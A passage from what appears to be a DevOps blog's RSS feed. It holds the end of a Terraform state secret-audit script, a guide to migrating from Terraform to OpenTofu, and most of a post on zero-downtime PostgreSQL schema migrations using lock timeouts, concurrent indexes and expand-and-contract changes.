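    try:
        doc = json.loads(raw)
    except (TypeError, ValueError):
        return {"status": "unreadable", "findings": []}
    if not isinstance(doc, dict):
        return {"status": "unreadable", "findings": []}
    if "encrypted_data" in doc and "resources" not in doc:
        return {"status": "encrypted", "findings": []}

    findings = []
    for name, output in (doc.get("outputs") or {}).items():
        if isinstance(output, dict) and output.get("sensitive") and output.get("value"):
            findings.append("output." + name)
    for resource in doc.get("resources") or []:
        address = "{}.{}".format(resource.get("type"), resource.get("name"))
        for index, instance in enumerate(resource.get("instances") or []):
            attributes = instance.get("attributes")
            if not isinstance(attributes, dict):
                continue
            for path, value in _leaves(attributes, []):
                # Use the nearest named key, so list elements inherit their parent's name.
                named = [part for part in path if not part.isdigit()]
                if not named or not isinstance(value, str) or not value:
                    continue
                if SECRET_NAME.search(named[-1]):
                    findings.append("{}[{}].{}".format(address, index, ".".join(path)))
    return {"status": "plaintext", "findings": sorted(findings)}


if __name__ == "__main__":
    print(audit_state(SAMPLE_PLAINTEXT))
    print(audit_state(SAMPLE_ENCRYPTED))
```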
<h3 id="h3-provider-for_each" class="group relative scroll-mt-24">
        <a href="#h3-provider-for_each" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Provider for_each
        </a>
        </h3><p>You can define multiple instances of a provider and iterate over them. This is the clean answer to the old problem of managing one provider configuration per region or per account without copy-pasting blocks for each one.</p>
<h3 id="h3-the-exclude-flag" class="group relative scroll-mt-24">
        <a href="#h3-the-exclude-flag" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The -exclude flag
        </a>
        </h3><p><code>-target</code> lets you act on a specific resource. OpenTofu adds the inverse, <code>-exclude</code>, so you can plan or apply everything except a resource you want to leave alone.</p>
<pre><code class="hljs language-bash"><span class="hljs-comment"># Apply everything except the database, which you are handling separately</span>
tofu apply -exclude=aws_db_instance.primary
</code></pre><h3 id="h3-early-variable-evaluation" class="group relative scroll-mt-24">
        <a href="#h3-early-variable-evaluation" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Early variable evaluation
        </a>
        </h3><p>OpenTofu can evaluate variables early, which means you can use them in places Terraform rejects, such as module <code>source</code> and <code>backend</code> configuration. That removes a class of workarounds teams have carried for years.</p>
<h3 id="h3-what-v112-added-may-2026" class="group relative scroll-mt-24">
        <a href="#h3-what-v112-added-may-2026" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What v1.12 added (May 2026)
        </a>
        </h3><p>The 1.12 release kept the gap open. Two changes that matter in daily use:</p>
<ul>
<li><code>destroy = false</code> in a resource lifecycle lets OpenTofu remove an object from state without destroying the real resource, a declarative version of <code>state rm</code>.</li>
<li><code>prevent_destroy</code> can now reference variables and other symbols in the module, instead of only a literal <code>true</code> or <code>false</code>.</li>
</ul>
<p>None of these is a reason to switch on its own. Together they show the fork is shipping, not coasting.</p>
<h2 id="h2-the-migration-is-the-easy-part" class="group relative scroll-mt-24">
        <a href="#h2-the-migration-is-the-easy-part" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The migration is the easy part
        </a>
        </h2><p>Here is the part most teams get backwards. They treat the migration as the risk. It is not. Terraform and OpenTofu share the same state format. OpenTofu reads and writes the same <code>.tfstate</code> JSON that Terraform produces. For most projects, moving over is a binary swap and a pipeline change.</p>
<h3 id="h3-step-1-back-up-your-state" class="group relative scroll-mt-24">
        <a href="#h3-step-1-back-up-your-state" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 1: back up your state
        </a>
        </h3><p>Always start here, no matter how confident you are.</p>
<pre><code class="hljs language-bash"><span class="hljs-comment"># Pull the current state to a local file before touching anything</span>
terraform state pull &gt; terraform.tfstate.backup
</code></pre><p>If you use a remote backend, also confirm you have versioning enabled (S3 versioning, for example) so you can roll back. The backup is a plaintext copy of your state, so store it as carefully as the state itself.</p>
<h3 id="h3-step-2-install-the-tofu-binary" class="group relative scroll-mt-24">
        <a href="#h3-step-2-install-the-tofu-binary" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 2: install the tofu binary
        </a>
        </h3><pre><code class="hljs language-bash"><span class="hljs-comment"># macOS</span>
brew install opentofu

<span class="hljs-comment"># Linux, via the official install script</span>
curl -fsSL https://get.opentofu.org/install-opentofu.sh -o install-opentofu.sh
<span class="hljs-built_in">chmod</span> +x install-opentofu.sh
./install-opentofu.sh --install-method deb

tofu version
<span class="hljs-comment"># OpenTofu v1.12.0</span>
</code></pre><h3 id="h3-step-3-initialize-with-opentofu" class="group relative scroll-mt-24">
        <a href="#h3-step-3-initialize-with-opentofu" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 3: initialize with OpenTofu
        </a>
        </h3><p>Run <code>tofu init</code> in the project. This re-initializes the working directory and pulls providers from the OpenTofu registry instead of the Terraform registry.</p>
<pre><code class="hljs language-bash">tofu init
<span class="hljs-comment"># Initializing the backend...</span>
<span class="hljs-comment"># Initializing provider plugins...</span>
<span class="hljs-comment"># - Finding hashicorp/aws versions matching &quot;&gt;= 5.0&quot;...</span>
<span class="hljs-comment"># - Installing hashicorp/aws v5.x...</span>
<span class="hljs-comment"># OpenTofu has been successfully initialized!</span>
</code></pre><h3 id="h3-step-4-plan-before-you-apply" class="group relative scroll-mt-24">
        <a href="#h3-step-4-plan-before-you-apply" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 4: plan before you apply
        </a>
        </h3><p>This is the rule that keeps you safe. Your first OpenTofu command against existing state is always <code>tofu plan</code>, never <code>tofu apply</code>. A clean migration shows no changes.</p>
<pre><code class="hljs language-bash">tofu plan
<span class="hljs-comment"># No changes. Your infrastructure matches the configuration.</span>
</code></pre><p>If you see unexpected changes, stop and investigate before applying. Common causes are provider version drift or a Terraform version that wrote state OpenTofu does not recognize. The version-skew note below covers the second case.</p>
<h3 id="h3-step-5-update-cicd" class="group relative scroll-mt-24">
        <a href="#h3-step-5-update-cicd" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 5: update CI/CD
        </a>
        </h3><p>Find every place your pipelines call <code>terraform</code> and swap it for <code>tofu</code>. The subcommands and flags are the same.</p>
<pre><code class="hljs language-yaml"><span class="hljs-comment"># Before (GitHub Actions)</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">run:</span> <span class="hljs-string">terraform</span> <span class="hljs-string">init</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">run:</span> <span class="hljs-string">terraform</span> <span class="hljs-string">plan</span> <span class="hljs-string">-out=tfplan</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">run:</span> <span class="hljs-string">terraform</span> <span class="hljs-string">apply</span> <span class="hljs-string">tfplan</span>

<span class="hljs-comment"># After</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">run:</span> <span class="hljs-string">tofu</span> <span class="hljs-string">init</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">run:</span> <span class="hljs-string">tofu</span> <span class="hljs-string">plan</span> <span class="hljs-string">-out=tfplan</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">run:</span> <span class="hljs-string">tofu</span> <span class="hljs-string">apply</span> <span class="hljs-string">tfplan</span>
</code></pre><p>For most teams, that is the whole migration. No state surgery, no rewrite.</p>
<h2 id="h2-where-the-real-lock-in-hides" class="group relative scroll-mt-24">
        <a href="#h2-where-the-real-lock-in-hides" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Where the real lock-in hides
        </a>
        </h2><p>If the migration is reversible, why does anyone hesitate? Because reversibility has a shelf life.</p>
<p>The moment you adopt an OpenTofu-only feature, the door starts closing. Encrypted state is the clearest example. Once OpenTofu writes an encrypted state file, Terraform cannot read it. The same applies to configuration that uses provider <code>for_each</code> or early evaluation in ways Terraform&#39;s parser rejects. Your code and state quietly become OpenTofu-shaped.</p>
<p>That is not a trap, it is a choice. Just make it on purpose. As long as you stay on shared features, you can move back to Terraform by swapping the binary the other way. Once you use the features that pulled you over, plan to stay.</p>
<h3 id="h3-the-version-skew-gotcha" class="group relative scroll-mt-24">
        <a href="#h3-the-version-skew-gotcha" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The version-skew gotcha
        </a>
        </h3><p>There is one real failure mode during migration. OpenTofu tracks the Terraform state format up to the version it forked from, and forward on its own line after that. If your team upgraded Terraform past the point OpenTofu supports, <code>tofu plan</code> may fail to read the state or report a format error.</p>
<p>The fix is ordered:</p>
<ol>
<li>Downgrade Terraform to a version OpenTofu supports.</li>
<li>Run <code>terraform apply</code> once to rewrite the state in the older format.</li>
<li>Migrate to OpenTofu and run <code>tofu plan</code> to confirm a clean result.</li>
</ol>
<p>This is why you test on a staging workspace first and never run <code>tofu apply</code> blind.</p>
<h2 id="h2-migration-strategies" class="group relative scroll-mt-24">
        <a href="#h2-migration-strategies" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Migration strategies
        </a>
        </h2><p>Pick the rollout that matches your size and risk tolerance.</p>
<p><strong>Big bang.</strong> Replace every <code>terraform</code> reference with <code>tofu</code> in one maintenance window. This suits small teams with a handful of configurations. It is fast and there is no period of running two tools side by side.</p>
<p><strong>Parallel run (dual-engine).</strong> Keep Terraform on legacy stacks, especially anything tied to Terraform Cloud or HashiCorp-specific features, and use OpenTofu for new, greenfield work. Migrate older modules when you have a reason to touch them anyway. Large organizations use this as a hedge. It avoids a risky all-at-once cutover and lets you adopt OpenTofu features only where you are ready to commit.</p>
<h2 id="h2-should-you-switch-a-decision-framework" class="group relative scroll-mt-24">
        <a href="#h2-should-you-switch-a-decision-framework" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Should you switch? A decision framework
        </a>
        </h2><pre><code class="hljs language-text">Do you build products or tooling on top of Terraform,
or need vendor-neutral governance?
        |
        +-- Yes --&gt; Switch to OpenTofu now.
        |
        No
        |
Do you want native state encryption, provider for_each,
or the other OpenTofu-only features?
        |
        +-- Yes --&gt; Switch to OpenTofu now.
        |
        No
        |
Do you have a large estate tied to Terraform Cloud / HCP?
        |
        +-- Yes --&gt; Dual-engine: OpenTofu for new work,
        |            Terraform for the locked-in stacks.
        |
        No
        |
Are you happy on Terraform Cloud, with no licensing concern?
        |
        +-- Yes --&gt; Staying is fine. Revisit yearly.
</code></pre><p><strong>Switch now</strong> if you build tooling on Terraform, care about open governance, or want the features Terraform&#39;s open-source CLI will not get. State encryption alone justifies it for many security-conscious teams.</p>
<p><strong>Run both</strong> if you have a large estate, especially one tied to Terraform Cloud or HCP-specific workflows. Move greenfield work to OpenTofu and migrate the rest over time.</p>
<p><strong>Stay</strong> if Terraform Cloud serves you well and the license does not touch your use case. There is no penalty for waiting, and the migration will be just as easy next year.</p>
<h2 id="h2-summary" class="group relative scroll-mt-24">
        <a href="#h2-summary" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Summary
        </a>
        </h2><p>The OpenTofu question is settled enough to act on in 2026. The fork is in the CNCF, it ships features Terraform&#39;s open-source CLI does not have, and Terraform itself is now an IBM product on a source-available license.</p>
<p>The mental model to keep:</p>
<ul>
<li>The migration is easy and reversible. Same state format, swap the binary, plan before apply.</li>
<li>The lock-in is a later, deliberate choice. It starts when you adopt OpenTofu-only features, not when you switch.</li>
<li>Match the rollout to your estate. Big bang for small teams, dual-engine for large ones.</li>
</ul>
<p>Back up your state, test on staging, run <code>tofu plan</code>, and decide based on the features you actually want rather than the fear of the move. The move is the easy part.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Zero-Downtime Database Migrations for PostgreSQL in Production]]></title>
      <link>https://devops-daily.com/posts/zero-downtime-postgresql-migrations-production</link>
      <description><![CDATA[A single ALTER TABLE can take down a busy PostgreSQL database for minutes. This post shows why that happens and how to ship schema changes safely with lock timeouts, the expand-and-contract pattern, and copy-paste SQL recipes for indexes, columns, constraints, and type changes.]]></description>
      <pubDate>Mon, 01 Jun 2026 09:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/zero-downtime-postgresql-migrations-production</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[postgresql]]></category><category><![CDATA[database-migrations]]></category><category><![CDATA[zero-downtime]]></category><category><![CDATA[devops]]></category><category><![CDATA[sql]]></category>
      <content:encoded><![CDATA[<p>It is 2am. A deploy goes out that adds an index to the <code>orders</code> table. The migration looks harmless:</p>
<pre><code class="hljs language-sql"><span class="hljs-keyword">CREATE</span> INDEX idx_orders_customer <span class="hljs-keyword">ON</span> orders (customer_id);
</code></pre><p>Thirty seconds later the on-call phone goes off. The API is returning 500s. The connection pool is maxed out. Every request that touches <code>orders</code> is hanging. The database is up, CPU is fine, but nothing is moving.</p>
<p>What happened is that <code>CREATE INDEX</code> without <code>CONCURRENTLY</code> takes a lock that blocks every write to the table for the entire build. On a 40 million row table that build takes minutes, and during those minutes every <code>INSERT</code>, <code>UPDATE</code>, and <code>DELETE</code> on <code>orders</code> waits in line. The web workers hold their database connections while they wait, the pool drains, and now even reads that have nothing to do with <code>orders</code> cannot get a connection.</p>
<p>That is a self-inflicted outage from one line of SQL. This post is about how to never ship that line again.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TL;DR
        </a>
        </h2><ul>
<li>A plain <code>ALTER TABLE</code> or <code>CREATE INDEX</code> takes a heavy lock. If it has to wait behind a slow query, it blocks every other query behind it too. One stuck statement stalls the whole table.</li>
<li>Always set <code>lock_timeout</code> (and <code>statement_timeout</code>) before schema changes so a migration fails fast instead of queueing and taking the table down.</li>
<li>Use <code>CREATE INDEX CONCURRENTLY</code> for indexes. It does not block writes.</li>
<li>Use the <strong>expand-and-contract</strong> pattern for anything that changes existing columns: add the new shape, backfill, switch the app, then drop the old shape in a later deploy.</li>
<li>Add constraints with <code>NOT VALID</code> first, then <code>VALIDATE CONSTRAINT</code> separately. The validation step does not block reads or writes.</li>
<li>Backfill large tables in small batches that each commit, never one giant <code>UPDATE</code>.</li>
</ul>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        </h2><ul>
<li>PostgreSQL 12 or newer. Most of this works on 11, but a few shortcuts (like skipping a table scan when setting <code>NOT NULL</code>) need 12+.</li>
<li>A database you can connect to with <code>psql</code> and a role that can run DDL.</li>
<li>Some way to deploy application code separately from migrations. The expand-and-contract pattern needs at least two deploys.</li>
<li>A staging database with production-like row counts. Lock behavior that is instant on 1,000 rows is a 4-minute outage on 40 million.</li>
</ul>
<h2 id="h2-why-a-simple-migration-takes-down-production" class="group relative scroll-mt-24">
        <a href="#h2-why-a-simple-migration-takes-down-production" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Why a "simple" migration takes down production
        </a>
        </h2><p>PostgreSQL uses table-level locks for schema changes. The two that bite people most:</p>
<ul>
<li><code>CREATE INDEX</code> (without <code>CONCURRENTLY</code>) takes a <code>SHARE</code> lock. Reads still work, but every write to the table blocks until the index finishes building.</li>
<li>Most forms of <code>ALTER TABLE</code> take an <code>ACCESS EXCLUSIVE</code> lock. That blocks everything, reads included, for as long as the statement runs.</li>
</ul>
<p>For something like adding a column, the <code>ACCESS EXCLUSIVE</code> lock is held only for a moment, because on PostgreSQL 11+ adding a column with a constant default is a metadata change. So why do people still get outages from a fast <code>ALTER TABLE</code>?</p>
<p>The answer is the lock queue, and it is the part most people miss.</p>
<p>When your <code>ALTER TABLE</code> asks for an <code>ACCESS EXCLUSIVE</code> lock and some long-running <code>SELECT</code> is already holding an <code>ACCESS SHARE</code> lock on the table, your <code>ALTER TABLE</code> has to wait. That is fine on its own. The problem is that while it waits, it sits at the front of the lock queue, and every new query that needs a conflicting lock now queues behind it. A plain <code>SELECT</code> needs <code>ACCESS SHARE</code>, which conflicts with the pending <code>ACCESS EXCLUSIVE</code>, so the <code>SELECT</code> waits too.</p>
<p>So the chain is: one slow analytics query holds a read lock, your instant <code>ALTER TABLE</code> queues behind it, and then every normal query on that table queues behind your <code>ALTER TABLE</code>. The table is frozen until the slow query finishes, even though your schema change would have taken 5 milliseconds.</p>
<p>You can watch it happen. Open a second session during a migration and run:</p>
<pre><code class="hljs language-sql"><span class="hljs-keyword">SELECT</span> pid, state, wait_event_type, <span class="hljs-keyword">left</span>(query, <span class="hljs-number">60</span>) <span class="hljs-keyword">AS</span> query
<span class="hljs-keyword">FROM</span> pg_stat_activity
<span class="hljs-keyword">WHERE</span> wait_event_type <span class="hljs-operator">=</span> <span class="hljs-string">&#x27;Lock&#x27;</span>
<span class="hljs-keyword">ORDER</span> <span class="hljs-keyword">BY</span> query_start;
</code></pre><pre><code class="hljs language-text">  pid  |        state        | wait_event_type |                           query
-------+---------------------+-----------------+------------------------------------------------------------
 18442 | active              | Lock            | ALTER TABLE orders ADD COLUMN region text
 18455 | active              | Lock            | SELECT * FROM orders WHERE id = $1
 18460 | active              | Lock            | SELECT * FROM orders WHERE id = $1
 18471 | active              | Lock            | UPDATE orders SET status = $1 WHERE id = $2
</code></pre><p>Three normal queries stuck behind one <code>ALTER TABLE</code> that is itself stuck behind something else. That is your outage.</p>
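<p>To find what the <code>ALTER TABLE</code> itself is waiting on, the query below (an added example, not part of the original post) walks the wait chain with <code>pg_blocking_pids()</code>, available since PostgreSQL 9.6, and lists each root blocker followed by the sessions queued behind it. The column aliases and the depth cap of 10 are choices made for this example.</p>

```sql
WITH RECURSIVE waits AS (
  -- One row per (waiting session, session it waits behind).
  -- pg_blocking_pids() reports lock holders and also sessions that are
  -- ahead in the lock queue with a conflicting request.
  SELECT a.pid AS waiter, blk.pid AS blocker
  FROM pg_stat_activity a
  CROSS JOIN LATERAL unnest(pg_blocking_pids(a.pid)) AS blk(pid)
  WHERE a.wait_event_type = 'Lock'
),
chain AS (
  -- Roots: sessions that block someone but are not waiting on a lock themselves
  SELECT DISTINCT w.blocker AS root, w.blocker AS pid, 0 AS depth
  FROM waits w
  WHERE w.blocker NOT IN (SELECT waiter FROM waits)
  UNION
  -- Walk outward to everything queued behind each root
  SELECT c.root, w.waiter, c.depth + 1
  FROM chain c
  JOIN waits w ON w.blocker = c.pid
  WHERE 10 > c.depth            -- example cap so the walk always terminates
)
SELECT c.root,
       c.depth,
       c.pid,
       a.state,
       now() - a.xact_start AS xact_age,
       left(a.query, 60)    AS query
FROM chain c
JOIN pg_stat_activity a ON a.pid = c.pid
ORDER BY c.root, c.depth, c.pid;
```

<p>Rows at depth 0 are the sessions to look at first: they block others without waiting on a lock themselves. <code>pg_blocking_pids()</code> needs brief exclusive access to the lock manager, so run it by hand during an incident rather than from a tight monitoring loop.</p>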
<h2 id="h2-always-set-a-lock-timeout" class="group relative scroll-mt-24">
        <a href="#h2-always-set-a-lock-timeout" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Always set a lock timeout
        </a>
        </h2><p>This is the single highest-value habit. Before any schema change, tell PostgreSQL to give up if it cannot get the lock quickly:</p>
<pre><code class="hljs language-sql"><span class="hljs-keyword">SET</span> lock_timeout <span class="hljs-operator">=</span> <span class="hljs-string">&#x27;3s&#x27;</span>;
<span class="hljs-keyword">SET</span> statement_timeout <span class="hljs-operator">=</span> <span class="hljs-string">&#x27;0&#x27;</span>;  <span class="hljs-comment">-- keep this off for long index builds</span>

<span class="hljs-keyword">ALTER TABLE</span> orders <span class="hljs-keyword">ADD</span> <span class="hljs-keyword">COLUMN</span> region text;
</code></pre><p>Now if the lock is not available within 3 seconds, the migration fails instead of queueing:</p>
<pre><code class="hljs language-text">ERROR:  canceling statement due to lock timeout
</code></pre><p>A failed migration is annoying. A frozen production table is an incident. The failed migration is the outcome you want, because it means the table kept serving traffic the entire time. You retry the migration later, ideally when no long-running query is holding the table.</p>
<p>Set this in your migration tool, not by hand. Most frameworks let you configure it. For raw SQL files, put the <code>SET lock_timeout</code> line at the top of every migration. Some teams set it in <code>postgresql.conf</code> for the migration role so it cannot be forgotten.</p>
<p>One caveat: <code>lock_timeout</code> only covers the wait to acquire the lock. A <code>CREATE INDEX CONCURRENTLY</code> that runs for 10 minutes is not affected, because it is doing work, not waiting. That is fine. The danger is the waiting, not the working.</p>
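<p>One way to automate the "fail fast, retry later" behaviour for a raw SQL migration, as an added example that is not from the original post: a <code>DO</code> block that catches the lock timeout (SQLSTATE 55P03, <code>lock_not_available</code>) and retries with a growing pause. The attempt limit and the pause lengths are assumptions; tune them for your workload.</p>

```sql
DO $$
DECLARE
  max_attempts CONSTANT int := 5;  -- assumption: give up after 5 tries
  attempt      int := 0;
BEGIN
  LOOP
    attempt := attempt + 1;
    BEGIN
      -- Third argument true = transaction-local, the same effect as SET LOCAL.
      PERFORM set_config('lock_timeout', '3s', true);

      ALTER TABLE orders ADD COLUMN region text;

      EXIT;  -- lock acquired and DDL applied: leave the retry loop
    EXCEPTION
      WHEN lock_not_available THEN
        -- The inner block is a subtransaction. It has been rolled back here,
        -- so this session no longer has a lock request queued on the table.
        IF attempt >= max_attempts THEN
          RAISE;  -- re-raise the lock timeout so the migration fails visibly
        END IF;
        RAISE NOTICE 'attempt % of % hit lock_timeout, retrying',
                     attempt, max_attempts;
        PERFORM pg_sleep(attempt * 2);  -- assumption: 2s, 4s, 6s, 8s pauses
    END;
  END LOOP;
END
$$;
```

<p>Each failed attempt rolls back its own subtransaction, so nothing is queued on <code>orders</code> while the block sleeps. This wrapper does not work for <code>CREATE INDEX CONCURRENTLY</code>, which cannot run inside a function or transaction block.</p>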
<h2 id="h2-build-indexes-concurrently" class="group relative scroll-mt-24">
        <a href="#h2-build-indexes-concurrently" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Build indexes concurrently
        </a>
        </h2><p>Never build an index on a live table without <code>CONCURRENTLY</code>:</p>
<pre><code class="hljs language-sql"><span class="hljs-comment">-- Wrong: blocks all writes for the whole build</span>
<span class="hljs-keyword">CREATE</span> INDEX idx_orders_customer <span class="hljs-keyword">ON</span> orders (customer_id);

<span class="hljs-comment">-- Right: writes keep working</span>
<span class="hljs-keyword">CREATE</span> INDEX CONCURRENTLY idx_orders_customer <span class="hljs-keyword">ON</span> orders (customer_id);
</code></pre><p><code>CONCURRENTLY</code> scans the table twice and takes longer, but it does not block reads or writes. The tradeoffs you need to know:</p>
<ul>
<li>It cannot run inside a transaction block. Many migration tools wrap every migration in a transaction by default. You have to turn that off for this migration (Rails has <code>disable_ddl_transaction!</code>, others have similar flags).</li>
<li>If it fails partway, it leaves an invalid index behind. This is the gotcha that surprises people.</li>
</ul>
<p>A common failure is building a unique index on data that turns out not to be unique:</p>
<pre><code class="hljs language-text">ERROR:  could not create unique index &quot;idx_users_email&quot;
DETAIL:  Key (email)=(jane@example.com) is duplicated.
</code></pre><p>The build failed, but PostgreSQL did not clean up after itself. You now have a leftover index marked invalid. Find it:</p>
<pre><code class="hljs language-sql"><span class="hljs-keyword">SELECT</span> indexrelid::regclass <span class="hljs-keyword">AS</span> index, indrelid::regclass <span class="hljs-keyword">AS</span> <span class="hljs-keyword">table</span>
<span class="hljs-keyword">FROM</span> pg_index
<span class="hljs-keyword">WHERE</span> <span class="hljs-keyword">NOT</span> indisvalid;
</code></pre><pre><code class="hljs language-text">        index        |  table
---------------------+---------
 idx_users_email     | users
</code></pre><p>Drop it (also concurrently, so the drop does not block writes either) and fix your data before retrying:</p>
<pre><code class="hljs language-sql"><span class="hljs-keyword">DROP</span> INDEX CONCURRENTLY idx_users_email;
</code></pre><h2 id="h2-the-expand-and-contract-pattern" class="group relative scroll-mt-24">
        <a href="#h2-the-expand-and-contract-pattern" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The expand-and-contract pattern
        </a>
        </h2><p>Indexes are the easy case. The hard case is changing a column that the application already reads and writes. Renaming a column, changing its type, making it <code>NOT NULL</code>, or splitting it into two columns all break the running application the instant the schema changes, because the old code still expects the old shape.</p>
<p>The fix is to never change a column in place while code depends on it. You split the change across multiple deploys. This is the expand-and-contract pattern, sometimes called parallel change.</p>
<pre><code class="hljs language-text">  Deploy 1: EXPAND     Deploy 2: MIGRATE      Deploy 3: CONTRACT
  add new shape        backfill + dual-write   drop old shape
  (additive only)      switch reads to new     (additive removal)

  old col ───────────────────────────────────────► dropped
  new col      ◄──── added ───────► written ──────► sole source
</code></pre><p>The rule that makes it safe: every individual deploy is backward compatible with the code that is still running. At no point does new schema require new code or new code require new schema.</p>
<p>Say you want to rename <code>users.name</code> to <code>users.full_name</code>. A plain <code>ALTER TABLE ... RENAME COLUMN</code> breaks every running instance of the old code that still selects <code>name</code>. Do this instead:</p>
<p><strong>Deploy 1 (expand).</strong> Add the new column. Nothing reads it yet.</p>
<pre><code class="hljs language-sql"><span class="hljs-keyword">SET</span> lock_timeout <span class="hljs-operator">=</span> <span class="hljs-string">&#x27;3s&#x27;</span>;
<span class="hljs-keyword">ALTER TABLE</span> users <span class="hljs-keyword">ADD</span> <span class="hljs-keyword">COLUMN</span> full_name text;
</code></pre><p>Update the application to write to both columns on every insert and update. Reads still come from <code>name</code>.</p>
<p><strong>Deploy 2 (migrate).</strong> Backfill the existing rows (see the batching section below), then switch reads to <code>full_name</code>. Now both columns are kept in sync and the app reads the new one.</p>
<p><strong>Deploy 3 (contract).</strong> Once you are sure no running code reads <code>name</code>, drop it:</p>
<pre><code class="hljs language-sql"><span class="hljs-keyword">SET</span> lock_timeout <span class="hljs-operator">=</span> <span class="hljs-string">&#x27;3s&#x27;</span>;
<span class="hljs-keyword">ALTER TABLE</span> users <span class="hljs-keyword">DROP</span> <span class="hljs-keyword">COLUMN</span> name;
</code></pre><p>Three deploys to rename a column feels like a lot. It is also the difference between a routine change and a customer-facing outage. The same pattern handles type changes (add <code>id_bigint</code>, backfill, swap), splitting columns, and moving data between tables.</p>
<h2 id="h2-adding-a-not-null-column-safely" class="group relative scroll-mt-24">
        <a href="#h2-adding-a-not-null-column-safely" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Adding a NOT NULL column safely
        </a>
        </h2><p>Adding a nullable column is cheap. Making a column <code>NOT NULL</code> is where people get caught, because a naive <code>SET NOT NULL</code> scans the whole table under an <code>ACCESS EXCLUSIVE</code> lock.</p>
<p>Do it in steps. First add the column nullable and backfill it. Then add a <code>CHECK</code> constraint as <code>NOT VALID</code>, which is instant because it skips the scan of existing rows and is enforced only on new writes:</p>
<pre><code class="hljs language-sql"><span class="hljs-keyword">ALTER TABLE</span> users <span class="hljs-keyword">ADD</span> <span class="hljs-keyword">COLUMN</span> email_verified <span class="hljs-type">boolean</span>;

<span class="hljs-comment">-- backfill here (see next section), then:</span>

<span class="hljs-keyword">SET</span> lock_timeout <span class="hljs-operator">=</span> <span class="hljs-string">&#x27;3s&#x27;</span>;
<span class="hljs-keyword">ALTER TABLE</span> users
  <span class="hljs-keyword">ADD CONSTRAINT</span> users_email_verified_not_null
  <span class="hljs-keyword">CHECK</span> (email_verified <span class="hljs-keyword">IS</span> <span class="hljs-keyword">NOT NULL</span>) <span class="hljs-keyword">NOT</span> VALID;
</code></pre><p>Now validate it in a separate statement. <code>VALIDATE CONSTRAINT</code> scans the table, but it takes only a <code>SHARE UPDATE EXCLUSIVE</code> lock, which allows reads and writes to continue:</p>
<pre><code class="hljs language-sql"><span class="hljs-keyword">ALTER TABLE</span> users VALIDATE <span class="hljs-keyword">CONSTRAINT</span> users_email_verified_not_null;
</code></pre><p>On PostgreSQL 12+ you can then promote it to a real <code>NOT NULL</code> and PostgreSQL skips the table scan, because the validated <code>CHECK</code> already proves no nulls exist:</p>
<pre><code class="hljs language-sql"><span class="hljs-keyword">ALTER TABLE</span> users <span class="hljs-keyword">ALTER</span> <span class="hljs-keyword">COLUMN</span> email_verified <span class="hljs-keyword">SET</span> <span class="hljs-keyword">NOT NULL</span>;
<span class="hljs-keyword">ALTER TABLE</span> users <span class="hljs-keyword">DROP</span> <span class="hljs-keyword">CONSTRAINT</span> users_email_verified_not_null;
</code></pre><p>The same <code>NOT VALID</code> then <code>VALIDATE</code> trick works for foreign keys. Adding a foreign key normally locks both tables while it checks every existing row. Split it:</p>
<pre><code class="hljs language-sql"><span class="hljs-keyword">ALTER TABLE</span> orders
  <span class="hljs-keyword">ADD CONSTRAINT</span> orders_customer_fk
  <span class="hljs-keyword">FOREIGN KEY</span> (customer_id) <span class="hljs-keyword">REFERENCES</span> customers (id) <span class="hljs-keyword">NOT</span> VALID;

<span class="hljs-keyword">ALTER TABLE</span> orders VALIDATE <span class="hljs-keyword">CONSTRAINT</span> orders_customer_fk;
</code></pre><h2 id="h2-backfill-in-small-committing-batches" class="group relative scroll-mt-24">
        <a href="#h2-backfill-in-small-committing-batches" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Backfill in small, committing batches
        </a>
